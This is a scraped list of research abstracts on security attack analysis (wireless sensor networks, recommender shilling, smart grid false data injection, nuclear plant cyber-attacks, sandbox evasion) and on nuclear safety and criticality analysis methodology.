    Full Text Available The IEEE 802.15.4 standard has been established as the dominant enabling technology for Wireless Sensor Networks (WSNs. With the proliferation of security-sensitive applications involving WSNs, WSN security has become a topic of great significance. In comparison with traditional wired and wireless networks, WSNs possess additional vulnerabilities which present opportunities for attackers to launch novel and more complicated attacks against such networks. For this reason, a thorough investigation of attacks against WSNs is required. This paper provides a single unified survey that dissects all IEEE 802.15.4 PHY and MAC layer attacks known to date. While the majority of existing references investigate the motive and behavior of each attack separately, this survey classifies the attacks according to clear metrics within the paper and addresses the interrelationships and differences between the attacks following their classification. The authors’ opinions and comments regarding the placement of the attacks within the defined classifications are also provided. A comparative analysis between the classified attacks is then performed with respect to a set of defined evaluation criteria. The first half of this paper addresses attacks on the IEEE 802.15.4 PHY layer, whereas the second half of the paper addresses IEEE 802.15.4 MAC layer attacks.

  4. Causal Meta-Analysis : Methodology and Applications

    NARCIS (Netherlands)

    Bax, L.J.

    2009-01-01

    Meta-analysis is a statistical method to summarize research data from multiple studies in a quantitative manner. This dissertation addresses a number of methodological topics in causal meta-analysis and reports the development and validation of meta-analysis software. In the first (methodological)

  5. Safety analysis methodology for OPR 1000

    International Nuclear Information System (INIS)

    Hwang-Yong, Jun

    2005-01-01

    Full text: Korea Electric Power Research Institute (KEPRI) has been developing inhouse safety analysis methodology based on the delicate codes available to KEPRI to overcome the problems arising from currently used vendor oriented methodologies. For the Loss of Coolant Accident (LOCA) analysis, the KREM (KEPRI Realistic Evaluation Methodology) has been developed based on the RELAP-5 code. The methodology was approved for the Westinghouse 3-loop plants by the Korean regulatory organization and the project to extent the methodology to the Optimized Power Reactor 1000 (OPR1000) has been ongoing since 2001. Also, for the Non-LOCA analysis, the KNAP (Korea Non-LOCA Analysis Package) has been developed using the UNICORN-TM code system. To demonstrate the feasibility of these codes systems and methodologies, some typical cases of the design basis accidents mentioned in the final safety analysis report (FSAR) were analyzed. (author)

  6. Anti-discrimination Analysis Using Privacy Attack Strategies

    KAUST Repository

    Ruggieri, Salvatore; Hajian, Sara; Kamiran, Faisal; Zhang, Xiangliang

    2014-01-01

    Social discrimination discovery from data is an important task to identify illegal and unethical discriminatory patterns towards protected-by-law groups, e.g., ethnic minorities. We deploy privacy attack strategies as tools for discrimination

  7. Shilling Attacks Detection in Recommender Systems Based on Target Item Analysis.

    Science.gov (United States)

    Zhou, Wei; Wen, Junhao; Koh, Yun Sing; Xiong, Qingyu; Gao, Min; Dobbie, Gillian; Alam, Shafiq

    2015-01-01

    Recommender systems are highly vulnerable to shilling attacks, both by individuals and groups. Attackers who introduce biased ratings in order to affect recommendations, have been shown to negatively affect collaborative filtering (CF) algorithms. Previous research focuses only on the differences between genuine profiles and attack profiles, ignoring the group characteristics in attack profiles. In this paper, we study the use of statistical metrics to detect rating patterns of attackers and group characteristics in attack profiles. Another question is that most existing detecting methods are model specific. Two metrics, Rating Deviation from Mean Agreement (RDMA) and Degree of Similarity with Top Neighbors (DegSim), are used for analyzing rating patterns between malicious profiles and genuine profiles in attack models. Building upon this, we also propose and evaluate a detection structure called RD-TIA for detecting shilling attacks in recommender systems using a statistical approach. In order to detect more complicated attack models, we propose a novel metric called DegSim' based on DegSim. The experimental results show that our detection model based on target item analysis is an effective approach for detecting shilling attacks.

  8. Shilling Attacks Detection in Recommender Systems Based on Target Item Analysis

    Science.gov (United States)

    Zhou, Wei; Wen, Junhao; Koh, Yun Sing; Xiong, Qingyu; Gao, Min; Dobbie, Gillian; Alam, Shafiq

    2015-01-01

    Recommender systems are highly vulnerable to shilling attacks, both by individuals and groups. Attackers who introduce biased ratings in order to affect recommendations, have been shown to negatively affect collaborative filtering (CF) algorithms. Previous research focuses only on the differences between genuine profiles and attack profiles, ignoring the group characteristics in attack profiles. In this paper, we study the use of statistical metrics to detect rating patterns of attackers and group characteristics in attack profiles. Another question is that most existing detecting methods are model specific. Two metrics, Rating Deviation from Mean Agreement (RDMA) and Degree of Similarity with Top Neighbors (DegSim), are used for analyzing rating patterns between malicious profiles and genuine profiles in attack models. Building upon this, we also propose and evaluate a detection structure called RD-TIA for detecting shilling attacks in recommender systems using a statistical approach. In order to detect more complicated attack models, we propose a novel metric called DegSim’ based on DegSim. The experimental results show that our detection model based on target item analysis is an effective approach for detecting shilling attacks. PMID:26222882

  9. Stealthy false data injection attacks using matrix recovery and independent component analysis in smart grid

    Science.gov (United States)

    JiWei, Tian; BuHong, Wang; FuTe, Shang; Shuaiqi, Liu

    2017-05-01

    Exact state estimation is vital important to maintain common operations of smart grids. Existing researches demonstrate that state estimation output could be compromised by malicious attacks. However, to construct the attack vectors, a usual presumption in most works is that the attacker has perfect information regarding the topology and so on even such information is difficult to acquire in practice. Recent research shows that Independent Component Analysis (ICA) can be used for inferring topology information which can be used to originate undetectable attacks and even to alter the price of electricity for the profits of attackers. However, we found that the above ICA-based blind attack tactics is merely feasible in the environment with Gaussian noises. If there are outliers (device malfunction and communication errors), the Bad Data Detector will easily detect the attack. Hence, we propose a robust ICA based blind attack strategy that one can use matrix recovery to circumvent the outlier problem and construct stealthy attack vectors. The proposed attack strategies are tested with IEEE representative 14-bus system. Simulations verify the feasibility of the proposed method.

  10. On-line diagnosis and recovery of adversary attack using logic flowgraph methodology simulation

    International Nuclear Information System (INIS)

    Guarro, S.B.

    1986-01-01

    The Logic Flowgraph Methodology (LFM) allows the construction of special graph models for simulation of complex processes of causality, including feedback loops and sequential effects. Among the most notable features of LFM is the formal inclusion in its models of causality conditioning by logic switches imbedded in the modeled process, such as faults or modes of operation. The LFM model of a process is a graph structure that captures, in one synthetic representation, the relevant success and fault space characterization of that process. LFM is very similar to an artificial intelligence expert system shell. To illustrate the utilization of LFM, an application to the assessment and on-line monitoring of a material control facility is presented. The LFM models are used to model adversary action and control response, and to generate mini-diagnostic and recovery trees in real time, as well as reliability tress for off-line evaluation. Although the case study presented is for an imaginary facility, most of the conceptual elements that would be present in a real application have been retained in order to highlight the features and capabilities of the methodology

  11. Preliminary safety analysis methodology for the SMART

    Energy Technology Data Exchange (ETDEWEB)

    Bae, Kyoo Hwan; Chung, Y. J.; Kim, H. C.; Sim, S. K.; Lee, W. J.; Chung, B. D.; Song, J. H. [Korea Atomic Energy Research Institute, Taejeon (Korea)

    2000-03-01

    This technical report was prepared for a preliminary safety analysis methodology of the 330MWt SMART (System-integrated Modular Advanced ReacTor) which has been developed by Korea Atomic Energy Research Institute (KAERI) and funded by the Ministry of Science and Technology (MOST) since July 1996. This preliminary safety analysis methodology has been used to identify an envelope for the safety of the SMART conceptual design. As the SMART design evolves, further validated final safety analysis methodology will be developed. Current licensing safety analysis methodology of the Westinghouse and KSNPP PWRs operating and under development in Korea as well as the Russian licensing safety analysis methodology for the integral reactors have been reviewed and compared to develop the preliminary SMART safety analysis methodology. SMART design characteristics and safety systems have been reviewed against licensing practices of the PWRs operating or KNGR (Korean Next Generation Reactor) under construction in Korea. Detailed safety analysis methodology has been developed for the potential SMART limiting events of main steam line break, main feedwater pipe break, loss of reactor coolant flow, CEA withdrawal, primary to secondary pipe break and the small break loss of coolant accident. SMART preliminary safety analysis methodology will be further developed and validated in parallel with the safety analysis codes as the SMART design further evolves. Validated safety analysis methodology will be submitted to MOST as a Topical Report for a review of the SMART licensing safety analysis methodology. Thus, it is recommended for the nuclear regulatory authority to establish regulatory guides and criteria for the integral reactor. 22 refs., 18 figs., 16 tabs. (Author)

  12. Depletion-of-Battery Attack: Specificity, Modelling and Analysis.

    Science.gov (United States)

    Shakhov, Vladimir; Koo, Insoo

    2018-06-06

    The emerging Internet of Things (IoT) has great potential; however, the societal costs of the IoT can outweigh its benefits. To unlock IoT potential, there needs to be improvement in the security of IoT applications. There are several standardization initiatives for sensor networks, which eventually converge with the Internet of Things. As sensor-based applications are deployed, security emerges as an essential requirement. One of the critical issues of wireless sensor technology is limited sensor resources, including sensor batteries. This creates a vulnerability to battery-exhausting attacks. Rapid exhaustion of sensor battery power is not only explained by intrusions, but can also be due to random failure of embedded sensor protocols. Thus, most wireless sensor applications, without tools to defend against rash battery exhausting, would be unable to function during prescribed times. In this paper, we consider a special type of threat, in which the harm is malicious depletion of sensor battery power. In contrast to the traditional denial-of-service attack, quality of service under the considered attack is not necessarily degraded. Moreover, the quality of service can increase up to the moment of the sensor set crashes. We argue that this is a distinguishing type of attack. Hence, the application of a traditional defense mechanism against this threat is not always possible. Therefore, effective methods should be developed to counter the threat. We first discuss the feasibility of rash depletion of battery power. Next, we propose a model for evaluation of energy consumption when under attack. Finally, a technique to counter the attack is discussed.

  13. Depletion-of-Battery Attack: Specificity, Modelling and Analysis

    Directory of Open Access Journals (Sweden)

    Vladimir Shakhov

    2018-06-01

    Full Text Available The emerging Internet of Things (IoT has great potential; however, the societal costs of the IoT can outweigh its benefits. To unlock IoT potential, there needs to be improvement in the security of IoT applications. There are several standardization initiatives for sensor networks, which eventually converge with the Internet of Things. As sensor-based applications are deployed, security emerges as an essential requirement. One of the critical issues of wireless sensor technology is limited sensor resources, including sensor batteries. This creates a vulnerability to battery-exhausting attacks. Rapid exhaustion of sensor battery power is not only explained by intrusions, but can also be due to random failure of embedded sensor protocols. Thus, most wireless sensor applications, without tools to defend against rash battery exhausting, would be unable to function during prescribed times. In this paper, we consider a special type of threat, in which the harm is malicious depletion of sensor battery power. In contrast to the traditional denial-of-service attack, quality of service under the considered attack is not necessarily degraded. Moreover, the quality of service can increase up to the moment of the sensor set crashes. We argue that this is a distinguishing type of attack. Hence, the application of a traditional defense mechanism against this threat is not always possible. Therefore, effective methods should be developed to counter the threat. We first discuss the feasibility of rash depletion of battery power. Next, we propose a model for evaluation of energy consumption when under attack. Finally, a technique to counter the attack is discussed.

  14. Ancestry Analysis in the 11-M Madrid Bomb Attack Investigation

    Science.gov (United States)

    Phillips, Christopher; Prieto, Lourdes; Fondevila, Manuel; Salas, Antonio; Gómez-Tato, Antonio; Álvarez-Dios, José; Alonso, Antonio; Blanco-Verea, Alejandro; Brión, María; Montesino, Marta; Carracedo, Ángel; Lareu, María Victoria

    2009-01-01

    The 11-M Madrid commuter train bombings of 2004 constituted the second biggest terrorist attack to occur in Europe after Lockerbie, while the subsequent investigation became the most complex and wide-ranging forensic case in Spain. Standard short tandem repeat (STR) profiling of 600 exhibits left certain key incriminatory samples unmatched to any of the apprehended suspects. A judicial order to perform analyses of unmatched samples to differentiate European and North African ancestry became a critical part of the investigation and was instigated to help refine the search for further suspects. Although mitochondrial DNA (mtDNA) and Y-chromosome markers routinely demonstrate informative geographic differentiation, the populations compared in this analysis were known to show a proportion of shared mtDNA and Y haplotypes as a result of recent gene-flow across the western Mediterranean, while any two loci can be unrepresentative of the ancestry of an individual as a whole. We based our principal analysis on a validated 34plex autosomal ancestry-informative-marker single nucleotide polymorphism (AIM-SNP) assay to make an assignment of ancestry for DNA from seven unmatched case samples including a handprint from a bag containing undetonated explosives together with personal items recovered from various locations in Madrid associated with the suspects. To assess marker informativeness before genotyping, we predicted the probable classification success for the 34plex assay with standard error estimators for a naïve Bayesian classifier using Moroccan and Spanish training sets (each n = 48). Once misclassification error was found to be sufficiently low, genotyping yielded seven near-complete profiles (33 of 34 AIM-SNPs) that in four cases gave probabilities providing a clear assignment of ancestry. One of the suspects predicted to be North African by AIM-SNP analysis of DNA from a toothbrush was identified late in the investigation as Algerian in origin. The results

  15. Denial-of-service attack detection based on multivariate correlation analysis

    NARCIS (Netherlands)

    Tan, Zhiyuan; Jamdagni, Aruna; He, Xiangjian; Nanda, Priyadarsi; Liu, Ren Ping; Lu, Bao-Liang; Zhang, Liqing; Kwok, James

    2011-01-01

    The reliability and availability of network services are being threatened by the growing number of Denial-of-Service (DoS) attacks. Effective mechanisms for DoS attack detection are demanded. Therefore, we propose a multivariate correlation analysis approach to investigate and extract second-order

  16. Methodology for Validating Building Energy Analysis Simulations

    Energy Technology Data Exchange (ETDEWEB)

    Judkoff, R.; Wortman, D.; O' Doherty, B.; Burch, J.

    2008-04-01

    The objective of this report was to develop a validation methodology for building energy analysis simulations, collect high-quality, unambiguous empirical data for validation, and apply the validation methodology to the DOE-2.1, BLAST-2MRT, BLAST-3.0, DEROB-3, DEROB-4, and SUNCAT 2.4 computer programs. This report covers background information, literature survey, validation methodology, comparative studies, analytical verification, empirical validation, comparative evaluation of codes, and conclusions.

  17. Modeling and Analysis of Information Attack in Computer Networks

    National Research Council Canada - National Science Library

    Pepyne, David

    2003-01-01

    .... Such attacks are particularly problematic because they take place in a "virtual cyber world" that lacks the social, economic, legal, and physical barriers and protections that control and limit crime in the material world. Research outcomes include basic theory, a modeling framework for Internet worms and email viruses, a sensor for user profiling, and a simple protocol for enhancing wireless security.

  18. Critical location identification and vulnerability analysis of interdependent infrastructure systems under spatially localized attacks

    International Nuclear Information System (INIS)

    Ouyang, Min

    2016-01-01

    Infrastructure systems are usually spatially distributed in a wide area and are subject to many types of hazards. For each type of hazards, modeling their direct impact on infrastructure components and analyzing their induced system-level vulnerability are important for identifying mitigation strategies. This paper mainly studies spatially localized attacks that a set of infrastructure components located within or crossing a circle shaped spatially localized area is subject to damage while other components do not directly fail. For this type of attacks, taking interdependent power and gas systems in Harris County, Texas, USA as an example, this paper proposes an approach to exactly identify critical locations in interdependent infrastructure systems and make pertinent vulnerability analysis. Results show that (a) infrastructure interdependencies and attack radius largely affect the position of critical locations; (b) spatially localized attacks cause less vulnerability than equivalent random failures; (c) in most values of attack radius critical locations identified by considering only node failures do not change when considering both node and edge failures in the attack area; (d) for many values of attack radius critical locations identified by topology-based model are also critical from the flow-based perspective. - Highlights: • We propose a method to identify critical locations in interdependent infrastructures. • Geographical interdependencies and attack radius largely affect critical locations. • Localized attacks cause less vulnerability than equivalent random failures. • Whether considering both node and edge failures affects critical locations. • Topology-based critical locations are also critical from flow-based perspective.

  19. [Comparative analysis of phenomenology of paroxysms of atrial fibrillation and panic attacks].

    Science.gov (United States)

    San'kova, T A; Solov'eva, A D; Nedostup, A V

    2004-01-01

    To study phenomenology of attacks of atrial fibrillation (AF) and to compare it with phenomenology of panic attacks for elucidation of pathogenesis of atrial fibrillation and for elaboration of rational therapeutic intervention including those aimed at correction of psychovegetative abnormalities. Patients with nonrheumatic paroxysmal AF (n=105) and 100 patients with panic attacks (n=100). Clinical, cardiological and neurological examination, analysis of patients complaints during attacks of AF, and comparison them with diagnostic criteria for panic attack. It was found that clinical picture of attacks of AF comprised vegetative, emotional and functional neurological phenomena similar to those characteristic for panic attacks. This similarity as well as positive therapeutic effect of clonazepam allowed to propose a novel pathogenic mechanism of AF attacks. Severity of psychovegetative disorders during paroxysm of AF could be evaluated by calculation of psychovegetative iudex: Psychovegetative index should be used for detection of panic attack-like component in clinical picture of AF paroxysm and thus for determination of indications for inclusion of vegetotropic drugs, e. g. clonazepam, in complex preventive therapy.

  20. An Analysis of Cyber-Attack on NPP Considering Physical Impact

    Energy Technology Data Exchange (ETDEWEB)

    Lee, In Hyo; Kang, Hyun Gook [KAIST, Daejeon (Korea, Republic of); Son, Han Seong [Joonbu University, Geumsan (Korea, Republic of)

    2016-05-15

    Some research teams performed related works on cyber-physical system which is a system that cyber-attack can lead to serious consequences including product loss, damage, injury and death when it is attacked. They investigated the physical impact on cyber-physical system due to the cyber-attack. But it is hard to find the research about NPP cyber security considering the physical impact or safety. In this paper, to investigate the relationship between physical impact and cyber-attack, level 1 PSA results are utilized in chapter 2 and cyber-attack analysis is performed in chapter 3. The cyber security issue on NPP is inevitable issue. Unlike general cyber security, cyber-physical system like NPP can induce serious consequences such as core damage by cyber-attack. So in this paper, to find how hacker can attack the NPP, (1) PSA results were utilized to find the relationship between physical system and cyber-attack and (2) vulnerabilities on digital control systems were investigated to find how hacker can implement the possible attack. It is expected that these steps are utilized when establishing penetration test plans or cyber security drill plans.

  1. An Analysis of Cyber-Attack on NPP Considering Physical Impact

    International Nuclear Information System (INIS)

    Lee, In Hyo; Kang, Hyun Gook; Son, Han Seong

    2016-01-01

    Some research teams performed related works on cyber-physical system which is a system that cyber-attack can lead to serious consequences including product loss, damage, injury and death when it is attacked. They investigated the physical impact on cyber-physical system due to the cyber-attack. But it is hard to find the research about NPP cyber security considering the physical impact or safety. In this paper, to investigate the relationship between physical impact and cyber-attack, level 1 PSA results are utilized in chapter 2 and cyber-attack analysis is performed in chapter 3. The cyber security issue on NPP is inevitable issue. Unlike general cyber security, cyber-physical system like NPP can induce serious consequences such as core damage by cyber-attack. So in this paper, to find how hacker can attack the NPP, (1) PSA results were utilized to find the relationship between physical system and cyber-attack and (2) vulnerabilities on digital control systems were investigated to find how hacker can implement the possible attack. It is expected that these steps are utilized when establishing penetration test plans or cyber security drill plans

  2. Probabilistic methodology for turbine missile risk analysis

    International Nuclear Information System (INIS)

    Twisdale, L.A.; Dunn, W.L.; Frank, R.A.

    1984-01-01

    A methodology has been developed for estimation of the probabilities of turbine-generated missile damage to nuclear power plant structures and systems. Mathematical models of the missile generation, transport, and impact events have been developed and sequenced to form an integrated turbine missile simulation methodology. Probabilistic Monte Carlo techniques are used to estimate the plant impact and damage probabilities. The methodology has been coded in the TURMIS computer code to facilitate numerical analysis and plant-specific turbine missile probability assessments. Sensitivity analyses have been performed on both the individual models and the integrated methodology, and probabilities have been estimated for a hypothetical nuclear power plant case study. (orig.)

  3. Bridging Two Worlds: Reconciling Practical Risk Assessment Methodologies with Theory of Attack Trees

    NARCIS (Netherlands)

    Gadyatskaya, Olga; Harpes, Carlo; Mauw, Sjouke; Muller, Cedric; Muller, Steve

    2016-01-01

    Security risk treatment often requires a complex cost-benefit analysis to be carried out in order to select countermeasures that optimally reduce risks while having minimal costs. According to ISO/IEC 27001, risk treatment relies on catalogues of countermeasures, and the analysts are expected to

  4. Programmable Logic Controller Modification Attacks for use in Detection Analysis

    Science.gov (United States)

    2014-03-27

    and J. Lowe, “The Myths and Facts Behind Cyber Security Risks for Industrial Control Systems ,” in Proceedings of the VDE Kongress, vol. 116, 2004. [13...Feb 2014 Date 20 Feb 2014 Date 20 Feb 2014 Date AFIT-ENG-14-M-66 Abstract Unprotected Supervisory Control and Data Acquisition (SCADA) systems offer...control and monitor physical industrial processes. Although attacks targeting SCADA systems have increased, there has been little work exploring the

  5. Disposal Criticality Analysis Methodology Topical Report

    International Nuclear Information System (INIS)

    Horton, D.G.

    1998-01-01

    The fundamental objective of this topical report is to present the planned risk-informed disposal criticality analysis methodology to the NRC to seek acceptance that the principles of the methodology and the planned approach to validating the methodology are sound. The design parameters and environmental assumptions within which the waste forms will reside are currently not fully established and will vary with the detailed waste package design, engineered barrier design, repository design, and repository layout. Therefore, it is not practical to present the full validation of the methodology in this report, though a limited validation over a parameter range potentially applicable to the repository is presented for approval. If the NRC accepts the methodology as described in this section, the methodology will be fully validated for repository design applications to which it will be applied in the License Application and its references. For certain fuel types (e.g., intact naval fuel), a ny processes, criteria, codes or methods different from the ones presented in this report will be described in separate addenda. These addenda will employ the principles of the methodology described in this report as a foundation. Departures from the specifics of the methodology presented in this report will be described in the addenda

  6. Disposal Criticality Analysis Methodology Topical Report

    International Nuclear Information System (INIS)

    D.G. Horton

    1998-01-01

    The fundamental objective of this topical report is to present the planned risk-informed disposal criticality analysis methodology to the NRC to seek acceptance that the principles of the methodology and the planned approach to validating the methodology are sound. The design parameters and environmental assumptions within which the waste forms will reside are currently not fully established and will vary with the detailed waste package design, engineered barrier design, repository design, and repository layout. Therefore, it is not practical to present the full validation of the methodology in this report, though a limited validation over a parameter range potentially applicable to the repository is presented for approval. If the NRC accepts the methodology as described in this section, the methodology will be fully validated for repository design applications to which it will be applied in the License Application and its references. For certain fuel types (e.g., intact naval fuel), any processes, criteria, codes or methods different from the ones presented in this report will be described in separate addenda. These addenda will employ the principles of the methodology described in this report as a foundation. Departures from the specifics of the methodology presented in this report will be described in the addenda

  7. Exploring Participatory Methodologies in Organizational Discourse Analysis

    DEFF Research Database (Denmark)

    Plotnikof, Mie

    2014-01-01

    Recent debates in the field of organizational discourse analysis stress contrasts in approaches as single-level vs. multi-level, critical vs. participatory, discursive vs. material methods. They raise methodological issues of combining such to embrace multimodality in order to enable new contribu......Recent debates in the field of organizational discourse analysis stress contrasts in approaches as single-level vs. multi-level, critical vs. participatory, discursive vs. material methods. They raise methodological issues of combining such to embrace multimodality in order to enable new...... contributions. As regards conceptual efforts are made but further exploration of methodological combinations and their practical implications are called for. This paper argues 1) to combine methodologies by approaching this as scholarly subjectification processes, and 2) to perform combinations in both...

  8. Comparative analysis of proliferation resistance assessment methodologies

    International Nuclear Information System (INIS)

    Takaki, Naoyuki; Kikuchi, Masahiro; Inoue, Naoko; Osabe, Takeshi

    2005-01-01

    Comparative analysis of the methodologies was performed based on the discussions in the international workshop on 'Assessment Methodology of Proliferation Resistance for Future Nuclear Energy Systems' held in Tokyo, on March 2005. Through the workshop and succeeding considerations, it is clarified that the proliferation resistance assessment methodologies are affected by the broader nuclear options being pursued and also by the political situations of the state. Even the definition of proliferation resistance, despite the commonality of fundamental issues, derives from perceived threat and implementation circumstances inherent to the larger programs. Deep recognitions of the 'difference' among communities would help us to make further essential and progressed discussion with harmonization. (author)

  9. Malware Analysis Sandbox Testing Methodology

    Directory of Open Access Journals (Sweden)

    Zoltan Balazs

    2016-01-01

    Full Text Available Manual processing of malware samples became impossible years ago. Sandboxes are used to automate the analysis of malware samples to gather information about the dynamic behaviour of the malware, both at AV companies and at enterprises. Some malware samples use known techniques to detect when it runs in a sandbox, but most of these sandbox detection techniques can be easily detected and thus flagged as malicious. I invented new approaches to detect these sandboxes. I developed a tool, which can collect a lot of interesting information from these sandboxes to create statistics how the current technologies work. After analysing these results I will demonstrate tricks to detect sandboxes. These tricks can’t be easily flagged as malicious. Some sandboxes don’t not interact with the Internet in order to block data extraction, but with some DNS-fu the information can be extracted from these appliances as well.

  10. Sampling methodology and PCB analysis

    International Nuclear Information System (INIS)

    Dominelli, N.

    1995-01-01

    As a class of compounds PCBs are extremely stable and resist chemical and biological decomposition. Diluted solutions exposed to a range of environmental conditions will undergo some preferential degradation and the resulting mixture may differ considerably from the original PCB used as insulating fluid in electrical equipment. The structure of mixtures of PCBs (synthetic compounds prepared by direct chlorination of biphenyl with chlorine gas) is extremely complex and presents a formidable analytical problem, further complicated by the presence of PCBs as contaminants in oils to soils to water. This paper provides some guidance into sampling and analytical procedures; it also points out various potential problems encountered during these processes. The guidelines provided deal with sample collection, storage and handling, sample stability, laboratory analysis (usually gas chromatography), determination of PCB concentration, calculation of total PCB content, and quality assurance. 1 fig

  11. Nondestructive assay methodologies in nuclear forensics analysis

    International Nuclear Information System (INIS)

    Tomar, B.S.

    2016-01-01

    In the present chapter, the nondestructive assay (NDA) methodologies used for analysis of nuclear materials as a part of nuclear forensic investigation have been described. These NDA methodologies are based on (i) measurement of passive gamma and neutrons emitted by the radioisotopes present in the nuclear materials, (ii) measurement of gamma rays and neutrons emitted after the active interrogation of the nuclear materials with a source of X-rays, gamma rays or neutrons

  12. Update of Part 61 impacts analysis methodology

    International Nuclear Information System (INIS)

    Oztunali, O.I.; Roles, G.W.

    1986-01-01

    The US Nuclear Regulatory Commission is expanding the impacts analysis methodology used during the development of the 10 CFR Part 61 rule to allow improved consideration of costs and impacts of disposal of waste that exceeds Class C concentrations. The project includes updating the computer codes that comprise the methodology, reviewing and updating data assumptions on waste streams and disposal technologies, and calculation of costs for small as well as large disposal facilities. This paper outlines work done to date on this project

  13. Update of Part 61 impacts analysis methodology

    International Nuclear Information System (INIS)

    Oztunali, O.I.; Roles, G.W.; US Nuclear Regulatory Commission, Washington, DC 20555)

    1985-01-01

    The US Nuclear Regulatory Commission is expanding the impacts analysis methodology used during the development of the 10 CFR Part 61 regulation to allow improved consideration of costs and impacts of disposal of waste that exceeds Class C concentrations. The project includes updating the computer codes that comprise the methodology, reviewing and updating data assumptions on waste streams and disposal technologies, and calculation of costs for small as well as large disposal facilities. This paper outlines work done to date on this project

  14. Constructive Analysis : A Study in Epistemological Methodology

    DEFF Research Database (Denmark)

    Ahlström, Kristoffer

    , and develops a framework for a kind of analysis that is more in keeping with recent psychological research on categorization. Finally, it is shown that this kind of analysis can be applied to the concept of justification in a manner that furthers the epistemological goal of providing intellectual guidance.......The present study is concerned the viability of the primary method in contemporary philosophy, i.e., conceptual analysis. Starting out by tracing the roots of this methodology to Platonic philosophy, the study questions whether such a methodology makes sense when divorced from Platonic philosophy...

  15. Analysis for Ad Hoc Network Attack-Defense Based on Stochastic Game Model

    Directory of Open Access Journals (Sweden)

    Yuanjie LI

    2014-06-01

    Full Text Available The attack actions analysis for Ad Hoc networks can provide a reference for the design security mechanisms. This paper presents an analysis method of security of Ad Hoc networks based on Stochastic Game Nets (SGN. This method can establish a SGN model of Ad Hoc networks and calculate to get the Nash equilibrium strategy. After transforming the SGN model into a continuous-time Markov Chain (CTMC, the security of Ad Hoc networks can be evaluated and analyzed quantitatively by calculating the stationary probability of CTMC. Finally, the Matlab simulation results show that the probability of successful attack is related to the attack intensity and expected payoffs, but not attack rate.

  16. Cyber-Attacks on Smart Meters in Household Nanogrid: Modeling, Simulation and Analysis

    Directory of Open Access Journals (Sweden)

    Denise Tellbach

    2018-02-01

    Full Text Available The subject of cyber-security and therefore cyber-attacks on smart grid (SG has become subject of many publications in the last years, emphasizing its importance in research, as well as in practice. One especially vulnerable part of SG are smart meters (SMs. The major contribution of simulating a variety of cyber-attacks on SMs that have not been done in previous studies is the identification and quantification of the possible impacts on the security of SG. In this study, a simulation model of a nanogrid, including a complete household with an SM, was developed. Different cyber-attacks were injected into the SM to simulate their effects on household nanogrid. The analysis of the impacts of different cyber-attacks showed that the effects of cyber-attacks can be sorted into various categories. Integrity and confidentiality attacks cause monetary effects on the grid. While, availability attacks have monetary effects on the grid as well, they are mainly aimed at compromising the SM communication by either delaying or stopping it completely.

  17. Weather and acute cardiovascular attacks: statistical analysis and results

    Energy Technology Data Exchange (ETDEWEB)

    Choisnel, E; Cohen, J Cl; Poisvert, M; van Thournout, A

    1987-01-01

    This study addresses the following question: to what extent could the onset of myocardial infarctions or cerebrovascular attacks be accounted for by short-term meteorological or environmental changes. The results from the Paris area are compared with results from Nancy (France), West Germany, and Japan. The authors conclude that weather change is one among other factors in the onset of myocardial infarction or of a cerebrovascular accident, but that the percentage of clinical cases really dependent on this atmospheric factor probably does not exceed ten percent of the cases. Far from being the only triggering effect, rapid fluctuations of the atmospheric situation have a marginal effect and are only an additional factor of risk in certain cases.

  18. Simplified methodology for Angra 1 containment analysis

    International Nuclear Information System (INIS)

    Neves Conti, T. das; Souza, A.L. de; Sabundjian, G.

    1991-08-01

    A simplified methodology of analysis was developed to simulate a Large Break Loss of Coolant Accident in the Angra 1 Nuclear Power Station. Using the RELAP5/MOD1, RELAP4/MOD5 and CONTEMPT-LT Codes, the time variation of pressure and temperature in the containment was analysed. The obtained data was compared with the Angra 1 Final Safety Analysis Report, and too those calculated by a Detailed Model. The results obtained by this new methodology such as the small computational time of simulation, were satisfactory when getting the preliminary evaluation of the Angra 1 global parameters. (author)

  19. Robust Structural Analysis and Design of Distributed Control Systems to Prevent Zero Dynamics Attacks

    Energy Technology Data Exchange (ETDEWEB)

    Weerakkody, Sean [Carnegie Mellon Univ., Pittsburgh, PA (United States); Liu, Xiaofei [Carnegie Mellon Univ., Pittsburgh, PA (United States); Sinopoli, Bruno [Carnegie Mellon Univ., Pittsburgh, PA (United States)

    2017-12-12

    We consider the design and analysis of robust distributed control systems (DCSs) to ensure the detection of integrity attacks. DCSs are often managed by independent agents and are implemented using a diverse set of sensors and controllers. However, the heterogeneous nature of DCSs along with their scale leave such systems vulnerable to adversarial behavior. To mitigate this reality, we provide tools that allow operators to prevent zero dynamics attacks when as many as p agents and sensors are corrupted. Such a design ensures attack detectability in deterministic systems while removing the threat of a class of stealthy attacks in stochastic systems. To achieve this goal, we use graph theory to obtain necessary and sufficient conditions for the presence of zero dynamics attacks in terms of the structural interactions between agents and sensors. We then formulate and solve optimization problems which minimize communication networks while also ensuring a resource limited adversary cannot perform a zero dynamics attacks. Polynomial time algorithms for design and analysis are provided.

  20. An Evaluation Methodology for Protocol Analysis Systems

    Science.gov (United States)

    2007-03-01

    Main Memory Requirement NS: Needham-Schroeder NSL: Needham-Schroeder-Lowe OCaml : Objective Caml POSIX: Portable Operating System...methodology is needed. A. PROTOCOL ANALYSIS FIELD As with any field, there is a specialized language used within the protocol analysis community. Figure...ProVerif requires that Objective Caml ( OCaml ) be installed on the system, OCaml version 3.09.3 was installed. C. WINDOWS CONFIGURATION OS

  1. Supplement to the Disposal Criticality Analysis Methodology

    International Nuclear Information System (INIS)

    Thomas, D.A.

    1999-01-01

    The methodology for evaluating criticality potential for high-level radioactive waste and spent nuclear fuel after the repository is sealed and permanently closed is described in the Disposal Criticality Analysis Methodology Topical Report (DOE 1998b). The topical report provides a process for validating various models that are contained in the methodology and states that validation will be performed to support License Application. The Supplement to the Disposal Criticality Analysis Methodology provides a summary of data and analyses that will be used for validating these models and will be included in the model validation reports. The supplement also summarizes the process that will be followed in developing the model validation reports. These reports will satisfy commitments made in the topical report, and thus support the use of the methodology for Site Recommendation and License Application. It is concluded that this report meets the objective of presenting additional information along with references that support the methodology presented in the topical report and can be used both in validation reports and in answering request for additional information received from the Nuclear Regulatory Commission concerning the topical report. The data and analyses summarized in this report and presented in the references are not sufficient to complete a validation report. However, this information will provide a basis for several of the validation reports. Data from several references in this report have been identified with TBV-1349. Release of the TBV governing this data is required prior to its use in quality affecting activities and for use in analyses affecting procurement, construction, or fabrication. Subsequent to the initiation of TBV-1349, DOE issued a concurrence letter (Mellington 1999) approving the request to identify information taken from the references specified in Section 1.4 as accepted data

  2. Nuclear methodology development for clinical analysis

    International Nuclear Information System (INIS)

    Oliveira, Laura Cristina de

    2003-01-01

